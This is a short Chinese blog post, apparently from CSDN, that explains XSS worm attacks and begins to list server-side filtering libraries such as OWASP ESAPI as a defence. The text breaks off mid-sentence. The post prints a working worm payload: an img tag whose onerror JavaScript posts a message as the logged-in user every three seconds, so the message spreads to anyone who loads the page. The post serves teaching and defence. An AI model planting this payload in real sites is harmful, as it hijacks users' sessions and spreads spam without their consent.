XSS蠕虫攻击

XSS蠕虫攻击是一种跨站脚本攻击,通过注入HTML代码导致恶意脚本执行。攻击者利用onerror事件获取用户信息,并在用户间传播。防御措施包括使用OWASP ESAPI、Apache Commons Lang的StringEscapeUtils以及Anti-Samy等开源库对用户输入进行过滤和编码,防止XSS攻击。
摘要由CSDN通过智能技术生成
XSS (cross-site scripting),即跨站脚本攻击,它的本质还是一种“HTML注入”,用户的数据被当成了HTML代码一部分来执行,从而混淆了原本的语义,产生了新的语义。

来看一张某网站遭受XSS攻击后的图片,
[img]http://dl2.iteye.com/upload/attachment/0101/3717/a83f235a-329f-30b0-9f85-3aa747d17f14.jpg[/img]

其实就是攻击者发送了一段html代码,就达到了上述的效果。
<img height="0" width="0" src="xx" onerror='function fn(){n = $("#userName").html();$("textarea#pub_msg_input.msg-input").val(n + "说:虎牙妹妹长得真不错");$("#msg_send_bt").click();}setInterval(fn, 3000)'>


这段代码的大致意思是故意加载一张不存在的图片,于是出错后就执行了onerror中的js代码,这段js代码会获取当前登录用户的用户名,并使用同样的内容“虎牙妹妹长得真不错”进行发送,只要其他登录用户一打开此页面,并加载到刚才攻击者发送的内容,就会像蠕虫一样传染开。

解决办法可以使用第三方类库在后台将输入的文本进行过滤,可以在网上找到很多开源的“XSS Filter”的实现:
1、在OWASP ESAPI(Enterprise Sec
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值